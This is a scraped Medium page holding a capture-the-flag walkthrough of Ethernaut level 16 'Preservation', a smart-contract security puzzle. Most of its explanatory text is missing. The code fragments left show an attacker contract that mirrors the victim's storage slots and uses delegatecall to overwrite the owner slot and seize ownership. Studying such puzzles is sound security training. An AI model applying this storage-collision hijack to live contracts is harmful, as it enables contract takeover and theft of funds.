Coinmonks
Published in

Coinmonks

Ethernaut Lvl 16 Preservation Walkthrough: How to inject malicious contracts with delegatecall

This is a in-depth series around Zeppelin team’s smart contract security puzzles. I’ll give you the direct resources and key concepts you’ll need to solve the puzzles 100% on your own.

Refresher on delegatecall

Recall from level 6:

Refresher on Contract Storage

Recall from level 12:

Detailed Walkthrough

uint storedTime; 
function setTime(uint _time) public {
storedTime = _time;
}

Part I — Create a malicious contract

contract BadLibraryContract {
address public timeZone1Library; // SLOT 0
address public timeZone2Library; // SLOT 1
address public owner; // SLOT 2
uint storedTime; // SLOT 3
...
function setTime(uint _time) public {
owner = msg.sender;
}
bytes4(keccak256(“setTime(uint256)”));
setFirstTime(uint _timeStamp)

Part II — Update timeZone1Library to the malicious contract

Part III — Gain Ownership

Key Security Takeaways

More Levels

Get Best Software Deals Directly In Your Inbox

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store